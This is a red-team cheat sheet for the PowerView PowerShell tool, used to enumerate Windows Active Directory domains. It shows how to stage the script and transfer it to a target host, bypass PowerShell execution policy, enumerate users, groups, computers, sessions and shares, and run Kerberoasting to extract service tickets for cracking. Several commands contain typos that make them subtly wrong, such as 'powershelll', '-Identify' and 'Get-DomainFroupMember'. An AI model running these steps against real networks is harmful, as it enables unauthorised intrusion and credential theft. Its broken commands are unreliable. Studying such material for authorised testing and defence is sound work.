PowerView
What is PowerView?
PowerView is a powershelll-based tool for gaining network situational awarness on windows domains
It acts as a powershelll alternative to
net*
commandsLeverages powershelll AD hooks and underlying Win32 API functions to interact with Active Directory.
Ideal for reconnaissance and privilege escalation during red team engagement
Setup
Download PowerView
mkdir /opt/ADtools
cd /opt/ADtools
wget https://raw.githubusercontent.com/powershelllMafia/PowerSploit/master/Recon/Powerview.ps1
Host PowerView using python HTTP server
python3 -m http.server
Transfer PowerViewto target Machine
powershelll (New-Object System.Net.WebClient).DownloadFile('url','PowerView.ps1')
Execute Policy Bypass
powershelll -nop -ep bypass
Import PowerView
To load all PowerView functions into the currentsessions:
Import-Module .\PowerView.ps1
To execute the script directly without importing the functions:
./PowerView.ps1
Active Directory Enumeration
Domain Enumerstion
Get Domain info
Get-Domain
Get-NetDomain
Get domain SID
Get-DomainSID
Get domain controllers:
Get-NetDomainController
Get-DomainController
Get-Domain -Domain infosecwarrior.local
User Enumeration
List all users
Get-NetUser
Get Abstract list of users:
Get-NetUser | select cn
Get user principal names:
Get-NetUser | select userprincipalname
get specific user details
Get-NetUser -UserName DevNull
Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identify DevNull
Get-DomainUser | select samaccountname
Get-DomainUser | select samaccountname,logonCount
Get list of all properties for a user
Get-DomainUser -Identify DevNull -Properties *
Get-DomainUser -Properties samaccountname,logonCount
Search a specific string in a user's attribute
Get-DomainUser -LDAPFilter "Description=*built*" | Select naem,Description
Group Enumeration
List all group
Get-NetGroup
Get-NetGroup -Domain infosecwarrior.local
Get-NetGroup -AdminCount
List group members
Get-DomainFroupMember "Domain Admins"
Get group members
Get-NetGroupMember -GroupName "administrators"
List local groups on a machine
Get-NetLocalGroup -ComputerName WC01
Get members of a specific local group ("Administrators") on a machine
Get-NetLocalGroupMember -ComputerName WC01 -GroupName Administrators
Get domain groups and membership
Get-DomainGroup
Get-DomainGroup -Domain infosecwarrior.local
Get-DomainGroup *admin* | select Name
Get-DomainGroup *admin* -Domain infosecwarrior.local | select Name
Get all members of the "Domain Admins" group (including nested groups)
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Equivalent with AD client
Get-ADGroupMember -Identity "Domain Admins" -Recurse
Get the group membership for a specifc user
Get-DomainGroup -UserName "DevNull"
Equivalent with AD cmdlet
Get-ADPrincipalGroupMembership -Identity Devnull
Computer Enumeration
List all computers
Get-NetComputer
Get-NetComputer -Ping
Get-NetComputer | select cn, operatingsystem
Get a list of all computers in trhe current domain
Get-DomainComputer | select Name
Get-DomainComputer | select dnshostname
Get-DomainComputer | select dnshostname, logonCount
Get-DomainComputer | select Name, dnshostname, logonCount
Get a list of all computers in the current domain
Get-DomainComputer | select -ExpandProperty dnshostname
Get computers running a specific OS
Get-DomainComputer -OperatingSystem "*Server 2022*"
Ping all discovered computer
Get-DomainComputer -Ping
Advanced Group and GPO Enumeration
Find GPO linked to a specific domain
Get-DomainGPO -Domain infosecwarrior.local
Get domain policies
Get-DomainPolicy
Get-DomainPolicyData -Policy DefaultDomainPolicy
Get-DomainPolicyData -Policy DomainControllerPolicy
Session and Logon Enumeration
Find localadmin access
Find-localAdminAccess
Get logged on users
Get-NetLoggedOn -ComputerName DC01.infosecwarrior.local
Get-LastLoggedOn -ComputerName DC01.infosecwarrior.local
Get-NetRDPSession -ComputerName DC01.infosecwarror.local
Get-LoggedOnLocal -Computername WC01
Network Share and File Discovery
Find shares on hosts in current domain
Invoke-ShareFinder -Verbose
Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
Get all file servers of the domain
Get-NetFileServer
Attack Techniques
kerberosting
Request and extract Service Principal Names (SPN) tickets for cracking
Invoke-Kerberoast
Admin Privilege Hunting
Find local admin access
invoke-EnumerateLocalAdmin
Network Share Discovery
identify network shares
Invoke-ShareFinder
Last updated